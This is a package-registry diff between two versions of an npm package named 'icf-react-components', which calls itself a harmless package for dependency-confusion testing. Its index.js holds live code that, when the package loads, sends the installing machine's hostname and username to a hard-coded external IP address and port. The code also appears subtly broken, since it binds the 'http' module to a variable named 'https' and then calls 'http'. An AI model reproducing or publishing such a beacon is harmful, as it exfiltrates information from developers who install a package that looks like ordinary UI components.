icf-react-components 1.0.1 → 1.0.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -2,7 +2,7 @@ const https = require('http'); // Use http instead of https for non-SSL setup
2
2
 
3
3
  // Replace 'YOUR_VPS_IP' with your actual VPS IP address
4
4
  const vpsIp = '62.171.155.146';
5
- const port = 54332;
5
+ const port = 54333;
6
6
 
7
7
  http.get(`http://${vpsIp}:${port}/report-install?host=${process.env.HOSTNAME}&user=${process.env.USER}`, (resp) => {
8
8
  console.log('Notification sent');
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "icf-react-components",
3
- "version": "1.0.1",
3
+ "version": "1.0.2",
4
4
  "description": "A harmless testing package for dependency confusion testing.",
5
5
  "main": "index.js",
6
6
  "scripts": {